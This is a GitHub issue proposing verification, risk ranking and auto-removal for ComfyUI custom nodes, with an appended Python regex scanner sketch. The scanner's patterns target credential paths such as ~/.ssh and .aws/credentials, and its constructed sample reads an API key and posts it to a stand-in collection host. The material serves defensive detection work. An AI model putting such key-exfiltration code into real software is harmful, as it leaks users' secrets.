This is a proposal, but it would be beneficial to add a verification and ranking system for custom nodes before installation to avoid or at least mitigate the risk of sensitive information being accessed from your computer. It's well known that installing any custom node grants nearly full access to your computer without any permission systems or similar safeguards.
A sandbox system or something similar could be implemented, but one of the simpler solutions might be using a regex that scans all files. If it detects calls to APIs, access to process.env, or environment variables, it could flag them. Additionally, custom nodes that have been confirmed to access and hack user systems could be auto-removed to prevent further propagation. An alert should also be displayed in the package manager, informing users that the package has been confirmed to compromise user systems and strongly advising against its installation. This prevents users from independently seeking out the package and potentially compromising their own systems.
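Here's an example of how ComfyUI-LLMVision has already compromised people's systems, highlighting the importance of such a measure: https://www.reddit.com/r/comfyui/comments/1dbls5n/psa_if_youve_used_the_comfyui_llmvision_node_from/
This issue is already occurring in VSCode. A solution that might serve as inspiration is ExtensionTotal, which scans for access to system/root file paths, process.env, and other sensitive information, then assigns a security level ranging from Low to High. https://medium.com/@bobcristello/millions-at-risk-dangerous-vscode-extensions-uncovered-d4e42e051cb8 https://www.extensiontotal.com/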
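The regex scan and Low-to-High ranking proposed in the issue above, sketched as an added example (not code from ComfyUI, ComfyUI-Manager or ExtensionTotal). The rule names, patterns, weights and thresholds are assumptions chosen for illustration, and the sample input is constructed.

```python
import re
from pathlib import Path

# Hypothetical rule set: category -> (weight, pattern). The categories come from the
# proposal (API calls, environment variables, system file paths); weights are assumed.
RULES = {
    "env_access": (2, re.compile(r"\bos\.environ\b|\bos\.getenv\s*\(|\bprocess\.env\b")),
    "network_call": (2, re.compile(
        r"\b(?:requests|httpx|aiohttp|urllib\.request|socket)\b\s*\.\s*\w+\s*\(|\bfetch\s*\(")),
    "sensitive_path": (3, re.compile(
        r"""["'][^"'\n]*(?:/etc/|/root/|~/\.ssh|\.aws/credentials|AppData)[^"'\n]*["']""")),
}
SCANNED_SUFFIXES = {".py", ".js"}


def scan_text(name, text):
    """Return findings as (file, line_no, category, stripped line) tuples."""
    findings = []
    for no, line in enumerate(text.splitlines(), 1):
        for category, (_, pattern) in RULES.items():
            if pattern.search(line):
                findings.append((name, no, category, line.strip()))
    return findings


def scan_node(root):
    """Scan every .py/.js file under a custom node directory."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix in SCANNED_SUFFIXES:
            findings += scan_text(str(path), path.read_text(errors="replace"))
    return findings


def rank(findings):
    """Map the distinct categories seen to Low/Medium/High (thresholds are assumed)."""
    score = sum(RULES[c][0] for c in {f[2] for f in findings})
    return "High" if score >= 4 else "Medium" if score >= 2 else "Low"


# Constructed sample input, not taken from any real custom node.
SAMPLE = '''import os, requests
key = os.environ.get("OPENAI_API_KEY")
requests.post("https://example.invalid/collect", data={"k": key})
'''

if __name__ == "__main__":
    hits = scan_text("sample_node.py", SAMPLE)
    print(*hits, "risk: " + rank(hits), sep="\n")
```

A line-based regex scan like this only sees literal source text, so its output is a triage signal for human review before installation rather than a verdict that a node is safe.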
rossaai changed the title from "Proposal for Security Enhancements: Verification and Ranking System for Custom Nodes" to "Proposal for Security Enhancements: Verification, Ranking, and Auto-Removal System for Custom Nodes" on Jun 20, 2024
Already, additional work is being done to add a verification layer to resolve this issue.
Management of trusted nodes will be handled through comfyregistry.